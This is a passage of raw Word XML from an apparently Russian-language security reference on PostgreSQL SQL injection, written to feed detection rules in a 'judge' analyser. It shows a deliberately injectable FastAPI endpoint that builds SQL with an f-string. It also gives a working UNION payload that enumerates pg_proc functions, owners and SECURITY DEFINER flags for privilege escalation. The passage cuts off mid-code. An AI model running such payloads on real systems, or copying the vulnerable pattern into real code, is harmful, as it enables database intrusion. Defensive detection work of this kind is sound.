          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. Класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQL_INJECTION_CLASSIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ловит сам факт конкатенации (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_RE["py_concat"]</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но не сигнализирует, что </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">payload содержит recon-функционал. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавить отдельный enum-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/schemas/sql.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) с базовым риском 7 и regex-веткой в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по образцу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>time_based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (строка 70). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.8.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74082AB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B66E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65877D37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB83F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: System Catalogs — pg_attribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15628488" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Object Identifier Types — regclass / regproc / regtype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F831B29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Information Schema overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5F837" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL section (db enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57004DCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — enumeration via pg_catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5293B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.2 pg_proc — функции, сигнатуры, исходники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB9705" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — каталог всех функций кластера (PUBLIC на SELECT). В одной таблице: имя, схема, язык реализации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_language</w:t>
      </w:r>
      <w:r>
        <w:t>), owner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proowner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), тип возврата, типы аргументов, флаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SECURITY DEFINER) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>исходный код</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для plpgsql/plperl/plpython функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит тело функции целиком, для C-функций — имя экспортированного символа в .so. Через UNION-инъекцию атакующий получает: (а) каталог всех функций с их владельцами и флагом SECURITY DEFINER — карту целей для эскалации привилегий (3.13); (б) тело конкретных функций для поиска SQL-инъекций в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format(...)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT ...' || ...</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD8BD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29495ABE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/reports.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2AFCFE"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52389189" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3418F2"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6CADF67F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D64644"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7F52A0B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBF8DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6868E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0754DABE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5866BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/reports")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A57F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_reports(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BCBF59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    kind: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01058A69"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4C9B7FC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04823138" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A6DF34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, title, generated_at FROM reports WHERE kind = '{kind}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD87A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA39F4"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0AEE447F"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1C6838A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Для UNION с метаданными типы приводятся к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proowner::regrole::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для owner, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang::regtype::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для языка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1494E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — каталог функций (сигнатуры, языки, owner-ы, SECURITY DEFINER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17561F10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `kind`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF2679A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>x' UNION SELECT p.oid::int, n.nspname || '.' || p.proname || '(' || pg_get_function_arguments(p.oid) || ')' || CASE WHEN p.prosecdef THEN ' SECURITY DEFINER' ELSE '' END || ' [' || l.lanname || ', owner=' || pg_get_userbyid(p.proowner) || ']', now() FROM pg_proc p JOIN pg_namespace n ON p.pronamespace = n.oid JOIN pg_language l ON p.prolang = l.oid WHERE n.nspname NOT IN ('pg_catalog', 'information_schema') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D6107" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60001A77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, generated_at FROM reports WHERE kind = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0427A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7275D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.oid::int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F348A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    n.nspname || '.' || p.proname || '('</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F4289" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || pg_get_function_arguments(p.oid) || ')'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1868A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || CASE WHEN p.prosecdef THEN ' SECURITY DEFINER' ELSE '' END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72736AD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
